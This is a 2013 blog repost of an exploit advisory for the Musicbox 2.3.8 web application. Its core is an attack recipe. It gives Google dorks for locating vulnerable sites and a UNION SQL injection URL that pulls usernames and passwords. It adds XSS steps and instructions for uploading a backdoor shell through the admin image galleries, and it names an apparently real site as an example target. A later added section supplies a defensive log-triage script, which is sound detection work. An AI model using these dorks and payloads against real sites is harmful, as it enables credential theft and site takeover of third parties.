Monday, 09 September 2013

Musicbox 2.3.8 Multiple Vulnerabilities

#Forum         : Newbie-Security Forum - Nothing Security Is Perfect
#Exploit Title : Musicbox 2.3.8 Multiple Vulnerabilities
#Author        : DevilScreaM
#Date          : 25/08/2013
#Category      : Web Applications
#Vendor        : http://www.musicboxv2.com/
#Version       : 1.0 - 2.3.8

#Dork  
intext:Musicbox Version
intext:Musicbox Version 2.3.8 © 2008
inurl:genre_albums.php?id=

#Vulnerability : SQL Injection Vulnerability, XSS Vulnerability, Shell Upload Vulnerability
#Tested On     : Windows 7 32 Bit (Mozilla & Chrome)
#Greetz        : Newbie-Security.or.id


SQL Injection Vulnerability

http://site-target/genre_albums.php?id=[SQLI]

Example
http://site-target/genre_albums.php?id=-3+UNION SELECT 1,concat_ws(0x3a3a,username,password),3,4,5,6,7,8,9,10+from+users--

==========================================================================================

Cross site scripting / XSS Vulnerability

*Search

1. Go to the Search feature

2. Enter your cross-site scripting input, for example "<h1>Tested by DevilScreaM</h1>", and click Search

3. See the result

Or view it through the URL

http://site-target/index.php?in=song&term=[Cross site scripting/XSS]&action=search&start=0

Example

http://site-target/index.php?in=song&term=<h1>Tested by DevilScreaM</h1>&action=search&start=0


========================================================================================

*News Profile

1. Register on the website, or go to http://site-target/register.php

2. Log in to the website

3. Go to the menu [ My News ]

4. In News Heading, enter your XSS, for example <h1>Tested by DevilScreaM</h1>

In Details, enter your XSS or plain text

See your XSS at http://site-target/member.php?uname=[YOUR_USERNAME]

Example

http://kankoa.com/musicbox/member.php?uname=devilscream


==========================================================================================

Shell Upload Vulnerability

*Artist Gallery

1. Go to the Admin page and log in

2. Go to Upload Artist Image, or go to the link

http://site-target/admin/adminpanel.php?action=artistgallery

3. Select your shell/backdoor and click Submit

4. The uploaded file ends up at

http://site-target/artist_gallery/Your_Backdoor.php


============================================================================================

*Album Gallery

1. Go to the Admin page and log in

2. Go to Upload Album Image, or go to the link

http://site-target/admin/adminpanel.php?action=albumgallery

3. Select an option, for example "All Album", and click Submit

4. Select your shell/backdoor and click Submit

5. The uploaded file ends up at

http://site-target/album_gallery/Your_Backdoor.php
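
For defenders running Musicbox, an added example (not part of the original advisory): a log-triage script that flags requests matching the three issues above, using the script names, parameters and gallery directories the advisory gives. It assumes a combined-format access log and that a legitimate genre id is a plain integer; the sample log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request field of a combined-format access log line.
REQ = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
MARKUP = re.compile(r"<[^>]*>")                 # tag-like text after URL decoding
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar)$", re.I)
UPLOAD_DIRS = ("/artist_gallery/", "/album_gallery/")

def classify(line):
    """Return the advisory issues ('sqli', 'xss', 'upload') one log line matches."""
    m = REQ.search(line)
    if not m:
        return set()
    url = urlsplit(m.group(1))
    path = url.path.lower()
    params = parse_qs(url.query, keep_blank_values=True)  # percent-decodes values
    hits = set()
    # Assumption: a legitimate genre id is a plain ASCII integer.
    if path.endswith("/genre_albums.php") and any(
            not (v.isascii() and v.isdigit()) for v in params.get("id", [])):
        hits.add("sqli")
    if path.endswith("/index.php") and any(
            MARKUP.search(v) for v in params.get("term", [])):
        hits.add("xss")
    # Image galleries should never serve server-side script files.
    if any(d in path for d in UPLOAD_DIRS) and SCRIPT_EXT.search(path):
        hits.add("upload")
    return hits

def triage(lines):
    """Map each issue to the 1-based numbers of the log lines that matched it."""
    report = {}
    for n, line in enumerate(lines, 1):
        for issue in sorted(classify(line)):
            report.setdefault(issue, []).append(n)
    return report

# Constructed sample log (documentation IP range, made-up file names).
SAMPLE_LOG = [
    '192.0.2.10 - - [25/Aug/2013:10:00:01 +0000] "GET /genre_albums.php?id=3 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [25/Aug/2013:10:00:05 +0000] "GET /genre_albums.php?id=3%27 HTTP/1.1" 200 310',
    '192.0.2.44 - - [25/Aug/2013:10:00:09 +0000] "GET /genre_albums.php?id=-3+UNION+SELECT+1,2,3 HTTP/1.1" 200 980',
    '192.0.2.44 - - [25/Aug/2013:10:01:12 +0000] "GET /index.php?in=song&term=%3Ch1%3Etest%3C%2Fh1%3E&action=search&start=0 HTTP/1.1" 200 2048',
    '192.0.2.10 - - [25/Aug/2013:10:02:00 +0000] "GET /index.php?in=song&term=love+songs&action=search&start=0 HTTP/1.1" 200 4096',
    '192.0.2.10 - - [25/Aug/2013:10:02:30 +0000] "GET /artist_gallery/photo.jpg HTTP/1.1" 200 20480',
    '192.0.2.44 - - [25/Aug/2013:10:05:45 +0000] "GET /album_gallery/cover.php HTTP/1.1" 200 77',
]

if __name__ == "__main__":
    for issue, nums in triage(SAMPLE_LOG).items():
        print(issue, nums)
```

The stored XSS through My News is submitted in a POST body, so it does not appear in an access log; checking for it means reviewing the stored news headings and details instead.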


==========================================================================================

Example Site Vuln SQL Injection


3 comments:

  1. Wow, this is great, thanks for the info :D

  2. Whoa, awesome, nice!!
    Greetings from STAR-US

  3. A must-try, as material for the collection
